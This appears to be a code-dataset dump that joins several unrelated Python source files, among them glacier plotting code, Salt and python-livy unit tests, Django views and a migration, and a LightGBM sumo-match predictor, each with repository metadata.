plt.figure('Main line terminus change, GID{}'.format(gid))
plt.plot(plot_years, -0.001*np.array(sim_termini), linewidth=2, color='k', linestyle='-', label='Modelled')
plt.errorbar(obs_years, -1*obs_term_centr, yerr = e, fmt='D')
plt.axes().tick_params(axis='both', length=5, width=2, labelsize=30)
plt.axes().set_xlim(2006, 2014.5)
plt.axes().set_xticks([2006, 2008, 2010, 2012, 2014])
plt.axes().set_ylim(-20, 2)
plt.axes().set_yticks([-20, -15, -10, -5, 0])
if gid==175:
plt.axes().set_xticklabels(['2006', '2008', '2010', '2012', '2014'])
plt.axes().set_xlabel('Year', size=35)
else:
plt.axes().set_xticklabels([])
if gid==3:
plt.axes().set_yticklabels(['-20', '', '-10', '', '0'])
plt.axes().set_ylabel('Terminus change [km]', size=35)
else:
plt.axes().set_yticklabels([])
plt.axes().set_aspect(0.3)
plt.show()
##
#####SINGLE NETWORK - splitting termini
#single_network_output = full_output_dicts['persistence']['GID10']
#plt.figure('Single network terminus change')
#for k in range(len(single_network_output)): #for each branch j
# #colork = alt_colors[mod(k, len(colors))]
# branch_termini = single_network_output[k]['Termini'] #for some reason enumerate doesn't work with loaded-in output, so we're stuck with this
# #markerk = (k+2, mod(k+1, 3), 0)
# plt.plot(testyears, -0.001*np.array(branch_termini[0:-1:]), linewidth=4, label='Branch {}'.format(k))
# #plt.plot(testyears[::10], -0.001*np.array(branch_termini[0:-1:])[::10], linewidth=0, color=colork, marker=markerk, ms=10)
#plt.legend(loc='lower left')
#plt.axes().set_xlabel('Year of simulation', size=30)
#plt.axes().set_ylabel('Terminus change [km]', size=30)
#plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
##plt.axes().set_ylim(-50, 1)
##plt.axes().set_yticks([-50, -25, 0])
#plt.show()
#
#####Flux
#for j, gid in enumerate(glaciers_to_plot):
# plt.figure('GID{}'.format(gid))
# ms_selection = mod(gid, len(styles))
# plt.plot(testyears, 1E-12*np.array(pernetwork_cumul_fx[j]), linewidth=4, label=str(gid), color=colors[ms_selection], linestyle = styles[ms_selection])
# plt.plot(testyears[::20], 1E-12*np.array(pernetwork_cumul_fx[j][::20]), linewidth=0, ms=10, marker=markers[ms_selection])
# plt.fill_between(testyears, y1=1E-12*np.array(pernetwork_cumul_fx[j]), y2=0, alpha=0.5)
# plt.axes().set_xlabel('Year of simulation', size=20)
# plt.axes().set_ylabel('Cumulative ice flux [Gt]', size=20)
# plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
# plt.axes().set_xlim(0,50)
# plt.axes().set_xticks([0,10,20, 30, 40, 50])
# #plt.axes().set_ylim(0, 401)
# #plt.axes().set_yticks([0, 50, 100, 150, 200, 250, 300, 350, 400])
# plt.show()
##
#######Sea level equivalent
#plt.figure(figsize=(12,8))
#for j, gid in enumerate(glaciers_to_plot):
# #if gid!=10:
# ms_selection = mod(gid, len(styles))
# plt.plot(testyears[::], scenario_sle[j], linewidth=4, color=colors[ms_selection], label=gid)
# plt.plot(testyears[::5], scenario_sle[j][::5], linewidth=0, marker=markers[ms_selection], ms=10, color=colors[ms_selection])
# if j==0:
# plt.fill_between(testyears[::], y1=scenario_sle[j], y2=0, color=colors[ms_selection], alpha=0.7)
# else:
# plt.fill_between(testyears[::], y1=scenario_sle[j], y2=scenario_sle[j-1], color=colors[ms_selection], alpha=0.7)
##plt.plot([0, 20, 40, 60], [0, 14, 28, 42], color='k', linewidth=1, ls='-', alpha=0.8) #GRACE linear trend
##rect = mpatches.Rectangle((98,8.5), width=2, height=4.6, color='k', alpha=0.7) # Nick et al total projection for 2100, A1B
##rect2 = mpatches.Rectangle((98,11.3), width=2, height=6.2, color='k', alpha=0.7) # Nick et al total projection for 2100, RCP8.5
##plt.axes().add_patch(rect)
##plt.axes().add_patch(rect2)
#plt.legend(loc='upper left')
#plt.axes().set_xlabel('Year of simulation', size=20)
#plt.axes().set_ylabel('Cumulative sea level contribution [mm]', size=20)
#plt.axes().tick_params(axis='both', length=5, width=2, labelsize=20)
##plt.axes().set_xlim(0, 100)
##plt.axes().set_xticks([0, 25, 50, 75, 100])
##plt.axes().set_ylim(0, 12)
##plt.axes().set_yticks([0, 2, 4, 6, 8, 10, 12])
#plt.show()
| 47.767516
| 198
| 0.677645
|
794e358db9dba650df024a9239322103f0972e54
| 2,068
|
py
|
Python
|
tests/unit/output/json_out_test.py
|
fictivekin/salt
|
f4b6f815d47ab8c790028e8ddad64ee0f8bb3f00
|
[
"Apache-2.0"
] | 2
|
2015-09-21T14:13:30.000Z
|
2016-02-12T11:33:46.000Z
|
tests/unit/output/json_out_test.py
|
fictivekin/salt
|
f4b6f815d47ab8c790028e8ddad64ee0f8bb3f00
|
[
"Apache-2.0"
] | 1
|
2019-09-06T13:57:28.000Z
|
2019-09-06T13:57:28.000Z
|
tests/unit/output/json_out_test.py
|
fictivekin/salt
|
f4b6f815d47ab8c790028e8ddad64ee0f8bb3f00
|
[
"Apache-2.0"
] | 2
|
2017-01-05T16:14:59.000Z
|
2019-01-31T23:15:25.000Z
|
# -*- coding: utf-8 -*-
'''
unittests for json outputter
'''
# Import Python Libs
from __future__ import absolute_import
# Import Salt Testing Libs
from salttesting import TestCase
from salttesting.helpers import ensure_in_syspath
ensure_in_syspath('../../')
# Import Salt Libs
from salt.output import json_out as json
class JsonTestCase(TestCase):
'''
Test cases for salt.output.json_out
'''
def setUp(self):
json.__opts__ = {}
self.data = {'test': 'two', 'example': 'one'}
def test_default_output(self):
ret = json.output(self.data)
expect = '{\n "test": "two", \n "example": "one"\n}'
self.assertEqual(expect, ret)
def test_pretty_output(self):
json.__opts__['output_indent'] = 'pretty'
ret = json.output(self.data)
expect = '{\n "example": "one", \n "test": "two"\n}'
self.assertEqual(expect, ret)
def test_indent_output(self):
json.__opts__['output_indent'] = 2
expect = '{\n "test": "two", \n "example": "one"\n}'
ret = json.output(self.data)
self.assertEqual(expect, ret)
def test_negative_zero_output(self):
json.__opts__['output_indent'] = 0
expect = '{\n"test": "two", \n"example": "one"\n}'
ret = json.output(self.data)
self.assertEqual(expect, ret)
def test_negative_int_output(self):
json.__opts__['output_indent'] = -1
expect = '{"test": "two", "example": "one"}'
ret = json.output(self.data)
self.assertEqual(expect, ret)
def test_unicode_output(self):
json.__opts__['output_indent'] = 'pretty'
data = {'test': '\xe1', 'example': 'one'}
expect = ('{"message": "\'utf8\' codec can\'t decode byte 0xe1 in position 0: unexpected end of data", '
'"error": "Unable to serialize output to json"}')
ret = json.output(data)
self.assertEqual(expect, ret)
if __name__ == '__main__':
from integration import run_tests
run_tests(JsonTestCase, needs_daemon=False)
| 30.411765
| 112
| 0.608801
|
794e35ef9b80c36133bc0ec1ec397d1cfa0b887c
| 5,446
|
py
|
Python
|
test/cli/test_submit.py
|
tzing/python-livy
|
0f2b0bf7832ae8fc65399506da294f4e8e019626
|
[
"MIT"
] | 1
|
2022-01-27T03:04:29.000Z
|
2022-01-27T03:04:29.000Z
|
test/cli/test_submit.py
|
tzing/python-livy
|
0f2b0bf7832ae8fc65399506da294f4e8e019626
|
[
"MIT"
] | null | null | null |
test/cli/test_submit.py
|
tzing/python-livy
|
0f2b0bf7832ae8fc65399506da294f4e8e019626
|
[
"MIT"
] | null | null | null |
import argparse
import datetime
import logging
import unittest
import unittest.mock
import livy.cli.submit as module
import livy.cli.config
import livy
class TestMain(unittest.TestCase):
def setUp(self) -> None:
# config getter
self.config = livy.cli.config.Configuration()
self.config.root.api_url = "http://example.com/"
patcher = unittest.mock.patch("livy.cli.config.load", return_value=self.config)
patcher.start()
self.addCleanup(patcher.stop)
# hook getter
patcher = unittest.mock.patch(
"livy.cli.submit.get_function", return_value=lambda x, y: y
)
self.get_function = patcher.start()
self.addCleanup(patcher.stop)
# livy client
self.client = unittest.mock.MagicMock(spec=livy.LivyClient)
self.client.create_batch.return_value = {"id": 1234}
patcher = unittest.mock.patch("livy.LivyClient", return_value=self.client)
patcher.start()
self.addCleanup(patcher.stop)
# log reader
self.reader = unittest.mock.MagicMock(spec=livy.LivyBatchLogReader)
patcher = unittest.mock.patch(
"livy.LivyBatchLogReader", return_value=self.reader
)
patcher.start()
self.addCleanup(patcher.stop)
def test_success(self):
# not reading log
self.assertEqual(
0,
module.main(
[
"test.py",
"--on-pre-submit",
"test_hook",
"--no-watch-log",
]
),
)
self.get_function.assert_called()
self.client.check.assert_called()
# reading log
self.client.get_batch_state.return_value = "success"
self.assertEqual(
0,
module.main(
[
"test.py",
"--on-pre-submit",
"test_hook",
]
),
)
def test_server_error(self):
self.client.check.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_create_batch_error_1(self):
self.client.create_batch.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_create_batch_error_2(self):
self.client.create_batch.return_value = {"foo": "bar"}
self.assertEqual(1, module.main(["test.py"]))
def test_readlog_error(self):
self.reader.read_until_finish.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_readlog_interrupt(self):
self.reader.read_until_finish.side_effect = KeyboardInterrupt()
self.assertEqual(1, module.main(["test.py"]))
def test_ending_get_batch_state(self):
self.client.get_batch_state.side_effect = livy.RequestError(0, "Test error")
self.assertEqual(1, module.main(["test.py"]))
def test_task_ending_error(self):
self.client.get_batch_state.return_value = "dead"
self.assertEqual(1, module.main(["test.py", "--on-task-failed", "test_hook"]))
class TestHelperFunc(unittest.TestCase):
def test_argument(self):
# memory size
self.assertEqual(module.argmem("1234GB"), "1234GB")
with self.assertRaises(argparse.ArgumentTypeError):
module.argmem("1234")
# key value pair
self.assertEqual(module.argkvpair("foo=bar=baz"), ("foo", "bar=baz"))
with self.assertRaises(ValueError):
module.argkvpair("1234")
def test_get_function(self):
# success
func = module.get_function("livy.cli.submit:get_function")
self.assertIs(func, module.get_function)
# nameing format error
self.assertIsNone(module.get_function("::error"))
# import error
self.assertIsNone(module.get_function("no_this_module:example"))
# func error
self.assertIsNone(module.get_function("livy.cli.submit:no_this_func"))
def test_run_hook(self):
logger = logging.getLogger(__name__)
args = unittest.mock.Mock(spec=argparse.Namespace)
patcher = unittest.mock.patch(
"livy.cli.submit.get_function", return_value=lambda x, y: y
)
# success
with patcher:
module.run_hook(logger, "TEST", args, ["foo"])
# failed to get func
with patcher as patch, self.assertRaises(SystemExit):
patch.return_value = None
module.run_hook(logger, "TEST", args, ["foo"])
# error during run action
with patcher as patch, self.assertRaises(SystemExit):
patch.return_value = unittest.mock.Mock(side_effect=ValueError())
module.run_hook(logger, "TEST", args, ["foo"])
# hook action's return value invalid
with patcher as patch, self.assertRaises(SystemExit):
patch.return_value = lambda x, y: None
module.run_hook(logger, "TEST", args, ["foo"])
def test_human_readable_timeperiod(self):
self.assertEqual(
"1h 5s",
module.human_readable_timeperiod(datetime.timedelta(seconds=3605)),
)
self.assertEqual(
"2d 1m 1s",
module.human_readable_timeperiod(datetime.timedelta(days=2, seconds=61)),
)
| 33.207317
| 87
| 0.608704
|
794e360407cf097b32fafa79d113cdba46d7f435
| 583
|
py
|
Python
|
wazimap_ng/profile/migrations/0016_auto_20200412_0544.py
|
arghyaiitb/wazimap-ng
|
2a77860526d865b8fd0c22a2204f121fdb3b28a0
|
[
"Apache-2.0"
] | 11
|
2019-12-31T20:27:22.000Z
|
2022-03-10T03:55:38.000Z
|
wazimap_ng/profile/migrations/0016_auto_20200412_0544.py
|
arghyaiitb/wazimap-ng
|
2a77860526d865b8fd0c22a2204f121fdb3b28a0
|
[
"Apache-2.0"
] | 164
|
2020-02-06T15:02:22.000Z
|
2022-03-30T22:42:00.000Z
|
wazimap_ng/profile/migrations/0016_auto_20200412_0544.py
|
arghyaiitb/wazimap-ng
|
2a77860526d865b8fd0c22a2204f121fdb3b28a0
|
[
"Apache-2.0"
] | 16
|
2020-01-03T20:30:24.000Z
|
2022-01-11T11:05:15.000Z
|
# Generated by Django 2.2.10 on 2020-04-12 05:44
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('profile', '0015_auto_20200411_2129'),
('points', '0013_auto_20200411_2129'),
]
operations = [
]
database_operations = [
migrations.AlterModelTable('Licence', 'datasets_licence'),
]
state_operations = [
]
operations = [
migrations.SeparateDatabaseAndState(
database_operations=database_operations,
state_operations=state_operations)
]
| 18.806452
| 68
| 0.641509
|
794e366fd616491d3e4e742376a5307708afc112
| 758
|
py
|
Python
|
misago/misago/threads/api/postingendpoint/protect.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | 2
|
2021-03-06T21:06:13.000Z
|
2021-03-09T15:05:12.000Z
|
misago/misago/threads/api/postingendpoint/protect.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
misago/misago/threads/api/postingendpoint/protect.py
|
vascoalramos/misago-deployment
|
20226072138403108046c0afad9d99eb4163cedc
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from . import PostingEndpoint, PostingMiddleware
class ProtectMiddleware(PostingMiddleware):
def use_this_middleware(self):
return self.mode == PostingEndpoint.EDIT
def get_serializer(self):
return ProtectSerializer(data=self.request.data)
def post_save(self, serializer):
if self.thread.category.acl["can_protect_posts"]:
try:
self.post.is_protected = serializer.validated_data.get("protect", False)
self.post.update_fields.append("is_protected")
except (TypeError, ValueError):
pass
class ProtectSerializer(serializers.Serializer):
protect = serializers.BooleanField(required=False, default=False)
| 31.583333
| 88
| 0.701847
|
794e3928e5d961cc192bf0eac058a450eb405eee
| 84
|
py
|
Python
|
nxted/files/rotate.py
|
xlcteam/nxtIDE
|
659ace68b060682aeeb6d789d88a7b6899a56f9a
|
[
"MIT"
] | 8
|
2015-02-16T23:11:30.000Z
|
2021-01-16T00:15:25.000Z
|
nxted/files/rotate.py
|
xlcteam/nxtIDE
|
659ace68b060682aeeb6d789d88a7b6899a56f9a
|
[
"MIT"
] | 3
|
2016-07-16T20:47:48.000Z
|
2021-03-25T21:27:11.000Z
|
nxted/files/rotate.py
|
xlcteam/nxtIDE
|
659ace68b060682aeeb6d789d88a7b6899a56f9a
|
[
"MIT"
] | 3
|
2015-08-30T18:23:51.000Z
|
2016-10-28T15:07:59.000Z
|
def main():
OnFwd(OUT_A, 100)
OnRev(OUT_B, 100)
while 1:
pass
| 12
| 21
| 0.511905
|
794e395c965ecb4db0f6cc555342351e2d387081
| 9,490
|
py
|
Python
|
src/git_portfolio/prompt.py
|
staticdev/github-portfolio
|
850461eed8160e046ee16664ac3dbc19e3ec0965
|
[
"MIT"
] | null | null | null |
src/git_portfolio/prompt.py
|
staticdev/github-portfolio
|
850461eed8160e046ee16664ac3dbc19e3ec0965
|
[
"MIT"
] | null | null | null |
src/git_portfolio/prompt.py
|
staticdev/github-portfolio
|
850461eed8160e046ee16664ac3dbc19e3ec0965
|
[
"MIT"
] | null | null | null |
"""User prompting module."""
from __future__ import annotations
from typing import Any
from typing import cast
import inquirer
import git_portfolio.domain.gh_connection_settings as gcs
import git_portfolio.domain.issue as i
import git_portfolio.domain.pull_request as pr
import git_portfolio.domain.pull_request_merge as prm
import git_portfolio.prompt_validation as val
class InquirerPrompter:
"""Question prompting using inquirer."""
@staticmethod
def connect_github(github_access_token: str) -> gcs.GhConnectionSettings:
"""Prompt questions to connect to Github."""
questions = [
inquirer.Password(
"github_access_token",
message="GitHub access token",
validate=val.not_empty_validation,
default=github_access_token,
),
inquirer.Text(
"github_hostname",
message="GitHub hostname (change ONLY if you use GitHub Enterprise)",
),
]
answers = inquirer.prompt(questions)
return gcs.GhConnectionSettings(
answers["github_access_token"], answers["github_hostname"]
)
@staticmethod
def new_repos(github_selected_repos: list[str]) -> Any:
"""Prompt question to know if you want to select new repositories."""
message = "\nThe configured repos will be used:\n"
for repo in github_selected_repos:
message += f" * {repo}\n"
print(message)
answer = inquirer.prompt(
[inquirer.Confirm("", message="Do you want to select new repositories?")]
)[""]
return answer
@staticmethod
def select_repos(repo_names: list[str]) -> Any:
"""Prompt questions to select new repositories."""
while True:
message = "Which repos are you working on? (Select pressing space)"
selected = inquirer.prompt(
[
inquirer.Checkbox(
"github_repos",
message=message,
choices=repo_names,
)
]
)["github_repos"]
if selected:
return selected
else:
print("Please select with `space` at least one repo.\n")
@staticmethod
def create_issues(github_selected_repos: list[str]) -> i.Issue:
"""Prompt questions to create issues."""
questions = [
inquirer.Text(
"title",
message="Write an issue title",
validate=val.not_empty_validation,
),
inquirer.Text("body", message="Write an issue body [optional]"),
inquirer.Text(
"labels", message="Write issue labels [optional, separated by comma]"
),
inquirer.Confirm(
"correct",
message=(
"Confirm creation of issue for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
labels = (
{label.strip() for label in answers["labels"].split(",")}
if answers["labels"]
else set()
)
return i.Issue(0, answers["title"], answers["body"], labels)
@staticmethod
def query_by_title(github_selected_repos: list[str], object_name: str) -> str:
"""Prompt questions to close/reopen issues or pull requests."""
questions = [
inquirer.Text(
"object_title_query",
message=f"Write {object_name} title or part of it",
validate=val.not_empty_validation,
),
inquirer.Confirm(
"correct",
message=(
f"Confirm closing {object_name}(s) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
return cast(str, answers["object_title_query"])
@staticmethod
def create_pull_requests(
github_selected_repos: list[str],
) -> pr.PullRequest:
"""Prompt questions to create pull requests."""
questions = [
inquirer.Text(
"base",
message="Write base branch name (destination)",
default="main",
validate=val.not_empty_validation,
),
inquirer.Text(
"head",
message="Write the head branch name (source)",
validate=val.not_empty_validation,
),
inquirer.Text(
"title", message="Write a PR title", validate=val.not_empty_validation
),
inquirer.Text("body", message="Write an PR body [optional]"),
# inquirer.Confirm(
# "draft", message="Do you want to create a draft PR?", default=False
# ),
inquirer.Text(
"labels", message="Write PR labels [optional, separated by comma]"
),
inquirer.Confirm(
"confirmation",
message="Do you want to link pull request to issues by title?",
default=False,
),
inquirer.Text(
"issues_title_query",
message="Write issue title (or part of it)",
default="",
validate=val.not_empty_validation,
ignore=val.ignore_if_not_confirmed,
),
inquirer.Confirm(
"inherit_labels",
message="Do you want to add labels inherited from the issues?",
default=True,
ignore=val.ignore_if_not_confirmed,
),
inquirer.Confirm(
"correct",
message=(
"Confirm creation of pull request(s) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
labels = (
{label.strip() for label in answers["labels"].split(",")}
if answers["labels"]
else set()
)
return pr.PullRequest(
answers["title"],
answers["body"],
labels,
answers["confirmation"],
answers["issues_title_query"],
answers["inherit_labels"],
answers["head"],
answers["base"],
False,
)
@staticmethod
def delete_branches(github_selected_repos: list[str]) -> str:
"""Prompt questions to delete branches."""
questions = [
inquirer.Text(
"branch",
message="Write the branch name",
validate=val.not_empty_validation,
),
inquirer.Confirm(
"correct",
message=(
"Confirm deleting of branch(es) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
return cast(str, answers["branch"])
@staticmethod
def merge_pull_requests(
github_username: str, github_selected_repos: list[str]
) -> prm.PullRequestMerge:
"""Prompt questions to merge pull requests."""
questions = [
inquirer.Text(
"base",
message="Write base branch name (destination)",
default="main",
validate=val.not_empty_validation,
),
inquirer.Text(
"head",
message="Write the head branch name (source)",
validate=val.not_empty_validation,
),
inquirer.Text(
"prefix",
message="Write base user or organization name from PR head",
default=github_username,
validate=val.not_empty_validation,
),
inquirer.Confirm(
"delete_branch",
message="Do you want to delete head branch on merge?",
default=False,
),
inquirer.Confirm(
"correct",
message=(
"Confirm merging of pull request(s) for the project(s) "
f"{github_selected_repos}. Continue?"
),
default=False,
),
]
correct = False
while not correct:
answers = inquirer.prompt(questions)
correct = answers["correct"]
return prm.PullRequestMerge(
answers["base"],
answers["head"],
answers["prefix"],
answers["delete_branch"],
)
| 34.384058
| 86
| 0.513066
|
794e3b37d45f4fc3326e29e616b25e67122f090b
| 154
|
py
|
Python
|
selfdrive/modeld/constants.py
|
Basketkase/openpilot
|
769e1cf7a8322ca83d1a86a2f547acf5e3a5a52e
|
[
"MIT"
] | 73
|
2017-10-28T20:52:31.000Z
|
2022-03-05T21:41:34.000Z
|
selfdrive/modeld/constants.py
|
Basketkase/openpilot
|
769e1cf7a8322ca83d1a86a2f547acf5e3a5a52e
|
[
"MIT"
] | 15
|
2021-09-03T10:11:55.000Z
|
2022-03-24T14:19:50.000Z
|
selfdrive/modeld/constants.py
|
Basketkase/openpilot
|
769e1cf7a8322ca83d1a86a2f547acf5e3a5a52e
|
[
"MIT"
] | 130
|
2020-08-19T04:20:02.000Z
|
2022-03-24T23:05:22.000Z
|
IDX_N = 33
def index_function(idx, max_val=192):
return (max_val/1024)*(idx**2)
T_IDXS = [index_function(idx, max_val=10.0) for idx in range(IDX_N)]
| 19.25
| 68
| 0.707792
|
794e3c0378d9145c9ef4990247907bc95cdc4432
| 4,024
|
py
|
Python
|
pred.py
|
debunagoya/PredictVictoryofSumou
|
16fe94defaab2173f2ca6d0051db768b38590907
|
[
"MIT"
] | null | null | null |
pred.py
|
debunagoya/PredictVictoryofSumou
|
16fe94defaab2173f2ca6d0051db768b38590907
|
[
"MIT"
] | 2
|
2020-09-26T01:03:52.000Z
|
2021-06-08T21:33:08.000Z
|
pred.py
|
debunagoya/PredictVictoryofSumou
|
16fe94defaab2173f2ca6d0051db768b38590907
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import lightgbm as lgb
import pickle
from sklearn import metrics
from sklearn.svm import SVC
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import LabelEncoder
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import LogisticRegression
from sklearn.ensemble import RandomForestClassifier as RandomForest
from sklearn.model_selection import GridSearchCV
## CSV読み込み
train = pd.read_csv("data/train.csv")
test = pd.read_csv("data/test.csv")
# ARR = []
# for i in range(1,13,2) :
# for j in range(1,16,1) :
# ARR.append([0,'Takakeisho','Kakuryu', 2020, i, j])
# test = pd.DataFrame(ARR, columns=['w_judge','w_name','e_name','year','month','day'])
### 欠損値の削除
train = train.dropna()
test = test.dropna()
train = train.drop(columns=['e_judge'])
train = train.drop(columns=['ruler'])
train = train.drop(columns=['w_rank'])
train = train.drop(columns=['e_rank'])
test = test.drop(columns=['e_judge'])
test = test.drop(columns=['ruler'])
test = test.drop(columns=['w_rank'])
test = test.drop(columns=['e_rank'])
# データセットを結合
train = pd.concat([train,test], ignore_index=True)
### Category Encorder
for column in ['w_judge']:
le = LabelEncoder()
le.fit(train[column])
train[column] = le.transform(train[column])
le.fit(test[column])
test[column] = le.transform(test[column])
### OneHot Encording
oh_w_class = pd.get_dummies(train.w_name)
oh_e_class = pd.get_dummies(train.e_name)
train.drop(['w_name','e_name'], axis=1, inplace=True)
train = pd.concat([train,oh_w_class,oh_w_class], axis=1)
_, i = np.unique(train.columns, return_index=True)
train = train.iloc[:, i]
### データセットの作成 (説明変数 -> X, 目的変数 -> Y)
X = train.drop('w_judge', axis=1)
y = train.w_judge
# print('X shape: {}, y shape: {}'.format(X.shape, y.shape))
### データセットの分割
# X_train = X[0:len(X)-len(ARR)]
# X_test = X.tail(len(ARR))
# y_train = y[0:len(y)-len(ARR)]
# y_test = y.tail(len(ARR))
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=None)
# print("LinearRegression")
# model = LinearRegression()
# model.fit(X_train,y_train)
# print(model.score(X_train,y_train))
#
# print("LogisticRegression")
# model = LogisticRegression()
# model.fit(X_train,y_train)
# print(model.score(X_train,y_train))
# print("SVM")
# model = SVC()
# model.fit(X_train, y_train)
# predicted = model.predict(X_test)
# print(metrics.accuracy_score(Y_test, predicted))
# print("GridSearch")
# best_score = 0
# for gamma in [0.001, 0.01, 0.1, 1, 10, 100]:
# for C in [0.001, 0.01, 0.1, 1, 10, 100]:
# print(str(gamma) + "," + str(C))
# svm = SVC(gamma=gamma, C=C)
# svm.fit(X_train, y_train.values.ravel())
# score = svm.score(X_test, y_test)
# if score > best_score:
# best_score = score
# best_parameters = {'C':C, 'gamma':gamma}
# print("Best score: " + str(best_score))
# print("Best parameters: " + str(best_parameters))
# print("RandomForest")
# model = RandomForest(n_estimators=100).fit(X_train, y_train)
# print(model.score(X_test, y_test))
print("LightGBM")
train = lgb.Dataset(X_train, y_train)
test = lgb.Dataset(X_test, y_test, reference=train)
params = {
'objective': 'binary',
'metric': 'auc',
}
model = lgb.train(params, train, valid_sets=test)
with open('model.pickle', mode='wb') as f:
pickle.dump(model, f)
with open('model.pickle', mode='rb') as f:
model = pickle.load(f)
y_pred = model.predict(X_test, num_iteration=model.best_iteration)
print(len(y_pred))
acc = 0
for i in range(len(y_pred)) :
acc = acc + y_pred[i]
print(acc / len(y_pred))
# model.save_model('model.txt')
#bst = lgb.Booster(model_file='model.txt')
#ypred = bst.predict(X_test, num_iteration=bst.best_iteration)
# fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred)
# auc = metrics.auc(fpr, tpr)
# print(auc)
| 29.807407
| 91
| 0.684891
|
794e3c19a4bb43ecdec762ffd05a01ccf93378da
| 331
|
py
|
Python
|
getUserInput.py
|
yogajia/Field-Programming
|
19891a9fff4cf66c60a4a5d9b1bd03f8d06f884b
|
[
"MIT"
] | null | null | null |
getUserInput.py
|
yogajia/Field-Programming
|
19891a9fff4cf66c60a4a5d9b1bd03f8d06f884b
|
[
"MIT"
] | null | null | null |
getUserInput.py
|
yogajia/Field-Programming
|
19891a9fff4cf66c60a4a5d9b1bd03f8d06f884b
|
[
"MIT"
] | 6
|
2021-10-30T00:17:23.000Z
|
2021-10-30T01:08:09.000Z
|
def getUserInput():
level = 1
print("输出:请输入你的年级")
grade = input("输入:")
if grade in ["一年级", "二年级"]:
level = 1
if grade in ["三年级", "四年级"]:
level = 2
if grade in ["五年级", "六年级"]:
level = 3
print("输出:请输入题目数")
num = input("输入:")
return level, int(num)
# print(getUserInput())
| 20.6875
| 31
| 0.504532
|
794e3c6584938c883a90a558379a5dbfd424b2dc
| 3,375
|
py
|
Python
|
apps/home/views.py
|
jjsanchezc/CONPY
|
c7a92f5bbf214813bc7f79baff803657fb40f3a2
|
[
"MIT"
] | 1
|
2022-02-19T17:21:57.000Z
|
2022-02-19T17:21:57.000Z
|
apps/home/views.py
|
jjsanchezc/CONPY
|
c7a92f5bbf214813bc7f79baff803657fb40f3a2
|
[
"MIT"
] | null | null | null |
apps/home/views.py
|
jjsanchezc/CONPY
|
c7a92f5bbf214813bc7f79baff803657fb40f3a2
|
[
"MIT"
] | null | null | null |
# -*- encoding: utf-8 -*-
"""
Copyright (c) 2019 - present AppSeed.us
"""
import os
from django.shortcuts import render
from fileinput import filename
from django import template
from django.contrib.auth.decorators import login_required
from django.http import HttpRequest, HttpResponse, HttpResponseRedirect
from django.template import loader
from django.urls import reverse
import apps.home.dataManagement.ingresos.manage as idm
import apps.home.dataManagement.gastos.manage as gdm
from core import settings
@login_required(login_url="/login/")
def index(request):
context = {'segment': 'index'}
html_template = loader.get_template('home/index.html')
return HttpResponse(html_template.render(context, request))
@login_required(login_url="/login/")
def pages(request):
context = {}
# All resource paths end in .html.
# Pick out the html file name from the url. And load that template.
try:
load_template = request.path.split('/')[-1]
if load_template == 'admin':
return HttpResponseRedirect(reverse('admin:index'))
context['segment'] = load_template
html_template = loader.get_template('home/' + load_template)
return HttpResponse(html_template.render(context, request))
except template.TemplateDoesNotExist:
html_template = loader.get_template('home/page-404.html')
return HttpResponse(html_template.render(context, request))
except:
html_template = loader.get_template('home/page-500.html')
return HttpResponse(html_template.render(context, request))
def upload(request):
print("llega hasta aca")
if request.method=="POST":
uploaded_file=request.FILES['documento']
print(uploaded_file.name)
print(uploaded_file.size)
return render(request,'upload-download.html')
@login_required(login_url="/login/")
def read_new_input(request):
"""metodo para leer el input de ingresos, este llama a las
funciones manage.py para poder procesarlos
Returns:
django.http.response.HttpResponse: devuelve a la pagina
de ingresos
"""
descr=request.POST.get('descripcion')
cant=request.POST.get('cantidad')
msg=None
exito=None
if request.POST.get('tipo')=='ingreso':
org=request.POST.get('origen/destino')
if cant!="" and org!="" :
try:
idm.add_ingresos(str(org),str(descr),float(cant))
exito="se ha añadido con exito a la base de datos"
except ValueError:
msg="no se han introducido datos correctos en cantidad"
else:
msg="Has dejado espacios obligatorios vacios"
elif request.POST.get('tipo')=='gasto':
destino=request.POST.get('origen/destino')
if cant!="" and destino!="" :
try:
gdm.add_gastos(str(destino),str(descr),float(cant))
exito="se ha añadido con exito a la base de datos"
except ValueError:
msg="no se han introducido datos correctos en cantidad"
else:
msg="Has dejado espacios obligatorios vacios"
print("gastos")
else:
print("no entré")
return render(request,'home/ingreso.html',{"msg":msg,"exito":exito})
def a(request):
print("--------------------------------------------\nhola soy a")
| 30.963303
| 72
| 0.653926
|
794e3cfa36ad6bc80f9103a307b39cb34c3659fd
| 539
|
py
|
Python
|
tests/aio/conftest.py
|
cuenca-mx/mongoengine-plus
|
01e55db2af58477bac2621ff51708daae3416268
|
[
"MIT"
] | null | null | null |
tests/aio/conftest.py
|
cuenca-mx/mongoengine-plus
|
01e55db2af58477bac2621ff51708daae3416268
|
[
"MIT"
] | 43
|
2021-04-30T20:02:49.000Z
|
2022-03-30T16:16:30.000Z
|
tests/aio/conftest.py
|
cuenca-mx/mongoengine-plus
|
01e55db2af58477bac2621ff51708daae3416268
|
[
